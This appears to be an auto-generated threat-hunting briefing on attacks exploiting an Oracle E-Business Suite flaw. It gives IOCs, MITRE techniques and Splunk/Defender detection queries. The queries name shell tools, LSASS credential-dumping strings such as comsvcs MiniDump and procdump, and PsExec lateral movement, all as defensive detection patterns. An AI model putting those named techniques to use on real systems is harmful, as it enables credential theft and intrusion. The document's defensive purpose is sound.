# [HIGH] Hackers now exploit critical Oracle E-Business flaw in attacks **Source:** BleepingComputer **Published:** 2026-06-29 **Article:** https://www.bleepingcomputer.com/news/security/new-oracle-e-business-suite-flaw-now-exploited-in-attacks/ ## Threat Profile Hackers now exploit critical Oracle E-Business flaw in attacks By Sergiu Gatlan June 29, 2026 09:46 AM 0 Attackers have begun exploiting a critical vulnerability (tracked as CVE-2026-46817 ) in the Oracle E-Business Suite (EBS) financial application, according to threat intelligence company Defused. This security flaw was found in the File Transmission component of EBS's Oracle Payments product and enables unauthenticated malicious actors with HTTP network access to take over vulnerab… ## Indicators of Compromise (high-fidelity only) - **CVE:** `CVE-2026-46817` - **CVE:** `CVE-2025-61882` - **CVE:** `CVE-2025-61884` - **CVE:** `CVE-2024-21182` - **CVE:** `CVE-2026-35273` - **IPv4 (defanged):** `200.107.207.26` - **IPv4 (defanged):** `161.97.99.49` - **IPv4 (defanged):** `162.55.17.215` - **IPv4 (defanged):** `104.194.11.200` - **Domain (defanged):** `pubstorm.com` - **Domain (defanged):** `pubstorm.net` ## MITRE ATT&CK Techniques - **T1190** — Exploit Public-Facing Application - **T1486** — Data Encrypted for Impact - **T1003.001** — LSASS Memory - **T1003** — OS Credential Dumping - **T1021.002** — SMB/Windows Admin Shares - **T1569.002** — Service Execution - **T1071** — Application Layer Protocol - **T1505.003** — Server Software Component: Web Shell - **T1059.004** — Command and Scripting Interpreter: Unix Shell - **T1071.004** — Application Layer Protocol: DNS - **T1567** — Exfiltration Over Web Service - **T1657** — Financial Theft ## Kill chain phases observed _(none detected from narrative keywords)_ ## Recommended hunts ### Oracle E-Business Suite web tier (java/httpd) spawning a shell — CVE-2026-46817 post-exploit RCE `UC_4_5` · phase: **exploit** · confidence: **Medium** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.parent_process_name IN ("java","java.exe","httpd","httpd.exe","apache2","beasvc.exe","weblogic.exe") AND Processes.process_name IN ("sh","bash","dash","ksh","python","python3","perl","cmd.exe","powershell.exe","pwsh","curl","wget","whoami","id","uname")) by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.parent_process | `drop_dm_object_name(Processes)` | convert ctime(firstTime) ctime(lastTime) ``` **Defender KQL:** ```kql DeviceProcessEvents | where Timestamp > ago(7d) | where InitiatingProcessFileName in~ ("java","java.exe","httpd","httpd.exe","apache2","beasvc.exe","weblogic.exe") | where FileName in~ ("sh","bash","dash","ksh","python","python3","perl","cmd.exe","powershell.exe","pwsh","curl","wget","whoami","id","uname") | where AccountName !endswith "$" | project Timestamp, DeviceName, AccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine, FolderPath, SHA256 | order by Timestamp desc ``` ### Host communicating with Clop EBS extortion infrastructure (pubstorm[.]com / pubstorm[.]net) `UC_4_6` · phase: **actions** · confidence: **High** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Network_Resolution.DNS where (DNS.query="pubstorm.com" OR DNS.query="*.pubstorm.com" OR DNS.query="pubstorm.net" OR DNS.query="*.pubstorm.net") by DNS.src DNS.query DNS.dest | `drop_dm_object_name(DNS)` | convert ctime(firstTime) ctime(lastTime) ``` **Defender KQL:** ```kql DeviceNetworkEvents | where Timestamp > ago(30d) | where RemoteUrl has_any ("pubstorm.com","pubstorm.net") | project Timestamp, DeviceName, InitiatingProcessAccountName, InitiatingProcessFileName, InitiatingProcessCommandLine, RemoteUrl, RemoteIP, RemotePort | order by Timestamp desc ``` ### Inbound CL0P extortion email from pubstorm.com / pubstorm.net `UC_4_7` · phase: **actions** · confidence: **High** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Email.All_Email where (All_Email.src_user="*@pubstorm.com" OR All_Email.src_user="*@pubstorm.net") by All_Email.src_user All_Email.recipient All_Email.subject | `drop_dm_object_name(All_Email)` | convert ctime(firstTime) ctime(lastTime) ``` **Defender KQL:** ```kql EmailEvents | where Timestamp > ago(30d) | where SenderFromDomain in~ ("pubstorm.com","pubstorm.net") or SenderMailFromDomain in~ ("pubstorm.com","pubstorm.net") | project Timestamp, SenderFromAddress, SenderMailFromAddress, RecipientEmailAddress, Subject, DeliveryAction, DeliveryLocation, NetworkMessageId | order by Timestamp desc ``` ### Internet-facing Oracle E-Business Suite hosts vulnerable to CVE-2026-46817 `UC_4_8` · phase: **exploit** · confidence: **High** · AI-generated for this article **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count from datamodel=Vulnerabilities.Vulnerabilities where (Vulnerabilities.signature="CVE-2026-46817" OR Vulnerabilities.cve="CVE-2026-46817") by Vulnerabilities.dest Vulnerabilities.signature Vulnerabilities.severity | `drop_dm_object_name(Vulnerabilities)` ``` **Defender KQL:** ```kql DeviceTvmSoftwareVulnerabilities | where CveId == "CVE-2026-46817" | join kind=leftouter (DeviceInfo | where Timestamp > ago(7d) | summarize arg_max(Timestamp, IsInternetFacing, PublicIP) by DeviceId) on DeviceId | project DeviceName, SoftwareVendor, SoftwareName, SoftwareVersion, CveId, VulnerabilitySeverityLevel, RecommendedSecurityUpdate, IsInternetFacing, PublicIP | order by IsInternetFacing desc ``` ### Ransomware-style mass file rename / extension change `UC_RANSOM_ENCRYPT` · phase: **actions** · confidence: **Medium** **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count, dc(Filesystem.file_name) AS files from datamodel=Endpoint.Filesystem where Filesystem.action IN ("modified","renamed") by Filesystem.dest, Filesystem.user, _time span=1m | `drop_dm_object_name(Filesystem)` | where files > 200 | sort - files ``` **Defender KQL:** ```kql DeviceFileEvents | where Timestamp > ago(1d) | where InitiatingProcessAccountName !endswith "$" | where ActionType in ("FileRenamed","FileModified") | summarize files = dcount(FileName) by DeviceName, InitiatingProcessAccountName, bin(Timestamp, 1m) | where files > 200 // empirical: > 200 unique-file renames in 1m by one account on one host // is well above the P99 of legitimate bulk-tooling | order by files desc ``` ### LSASS process access / dump (credential theft) `UC_LSASS` · phase: **actions** · confidence: **High** **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="*lsass*" OR Processes.process="*sekurlsa*" OR Processes.process="*MiniDump*" OR Processes.process="*comsvcs.dll*MiniDump*" OR Processes.process="*procdump*lsass*") OR (Processes.process_name="rundll32.exe" AND Processes.process="*comsvcs*MiniDump*") by Processes.dest, Processes.user, Processes.process_name, Processes.process, Processes.parent_process_name | `drop_dm_object_name(Processes)` ``` **Defender KQL:** ```kql DeviceEvents | where Timestamp > ago(7d) | where AccountName !endswith "$" | where ActionType == "OpenProcessApiCall" | where FileName =~ "lsass.exe" | where InitiatingProcessFileName !in~ ("MsSense.exe","MsMpEng.exe","csrss.exe", "svchost.exe","wininit.exe","services.exe", "lsm.exe","SearchProtocolHost.exe") | project Timestamp, DeviceName, ActionType, FileName, InitiatingProcessFileName, InitiatingProcessCommandLine, InitiatingProcessFolderPath, AccountName | order by Timestamp desc ``` ### Remote service execution — PsExec / SMB lateral movement `UC_LATERAL_PSEXEC` · phase: **actions** · confidence: **High** **Splunk SPL (CIM):** ```spl | tstats `summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name IN ("psexec.exe","psexesvc.exe","paexec.exe","smbexec.py") OR (Processes.process_name="wmic.exe" AND Processes.process="*/node:*") by Processes.dest, Processes.user, Processes.process_name, Processes.process, Processes.parent_process_name | `drop_dm_object_name(Processes)` ``` **Defender KQL:** ```kql DeviceProcessEvents | where Timestamp > ago(7d) | where AccountName !endswith "$" | where FileName in~ ("psexec.exe","psexesvc.exe","paexec.exe","smbexec.py") or (FileName =~ "wmic.exe" and ProcessCommandLine has "/node:") | project Timestamp, DeviceName, AccountName, FileName, ProcessCommandLine, InitiatingProcessFileName | order by Timestamp desc ``` ### IOC-driven hunts (use shared templates) These are standard IOC-substitution hunts — the canonical SPL and KQL live once in [`_TEMPLATES.md`](../_TEMPLATES.md), so we don't repeat the same boilerplate on every CVE / hash / network-IOC briefing. - **Asset exposure — vulnerability matches article CVE(s)** ([template](../_TEMPLATES.md#asset-exposure)) — phase: **recon**, confidence: **High** - CVE(s): `CVE-2026-46817`, `CVE-2025-61882`, `CVE-2025-61884`, `CVE-2024-21182`, `CVE-2026-35273` - **Network connections to article IPs / domains** ([template](../_TEMPLATES.md#network-ioc)) — phase: **c2**, confidence: **High** - IP / domain IOC(s): `200.107.207.26`, `161.97.99.49`, `162.55.17.215`, `104.194.11.200`, `pubstorm.com`, `pubstorm.net` ## Why this matters Severity classified as **HIGH** based on: CVE present, IOCs present, 9 use case(s) fired, 12 technique(s) inferred. Read the full article for actor attribution, tooling details, and any defanged IOCs in the body that aren't visible in the RSS summary.